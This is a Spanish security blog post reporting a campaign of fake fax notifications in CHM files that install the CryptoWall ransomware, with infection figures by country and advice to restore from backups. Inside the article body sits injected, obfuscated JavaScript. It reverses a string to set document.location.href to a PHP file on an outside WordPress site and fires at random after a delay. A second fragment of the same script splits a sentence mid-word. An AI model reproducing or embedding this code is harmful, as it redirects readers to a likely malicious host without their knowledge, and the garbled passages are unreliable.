Notificaciones de fax falsas contienen el malware CryptoWall
Los programas encargados de cifrar los datos de los usuarios y pedir una recompensa a cambio de recuperar el acceso a ellos continúan de moda y una prueba de ello es sin lugar a dudas la última oleada de correos electrónicos. En ella se encuentra un serie de archivos CHM que prometen el acceso a una serie de mensajes enviados utilizando el fax. Sin embargo, el código HTML de estos provoca la descarga de un malware ya conocido, CryptoWall.
Al usuario se le intenta engañar invitándole a abrir el archivo, haciéndolo creer que en realidad en su interior puede encontrar varios mensajes fax que le han enviado. Sin embargo, la realidad es muy distinta y en realidad el archivo contiene un código HTML que permite la descarga del malware de forma automática y su posterior ejecución. Según la compañía Bitdefender, nuestro país es uno de los que posee una tasa de infección más alta, superado por Rumania y Estados Unidos.
Añaden que principalmente se está enviando a grandes y medianas empresas, produciéndose de esta forma la infección de unos pocos que permitirán una posterior expansión haciendo uso de memorias USB o cualquier otro tipo de unidad USB de almacenamiento.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>towall.jpg” alt=”” width=”798″ height=”483″ /><br />
Algunas informaciones hablan de que la campaña se habría iniciado la pasada semana, sin embargo, la cantidad de personas afectadas aumenta cada día, contabilizando centenares de nuevos usuarios cada día que pasa. Aunque auguran que sea una campaña relativamente corta, el funcionamien<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to de este ya se sabe cuál es: cifrar los archivos del equipo o parte de estos y solicitar al usuario un pago que permita el envío de la clave de descifrado y así recuperar el acceso a estos.
En lo referido a nuestro país, algunas informaciones apuntan a más de 700 infecciones en poco más de 4 días de actividad, y se espera durante los dos próximos días se puede llegar a las 1.500 o incluso superar dicha cifra.
La forma de recuperar los archivos no consiste en recurrir al pago, sino a una copia de seguridad que permita restaurar el equipo a un estado anterior y así disponer de nuevo de acceso a la información.
A los tres países mencionados con anterioridad hay que añadir Dinamarca, Suecia, Alemania, Canadá, Australia y Reino Unido.
Ver mas informacion original al respecto en Fuente:
toWall-Ransomware-475277.shtml
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.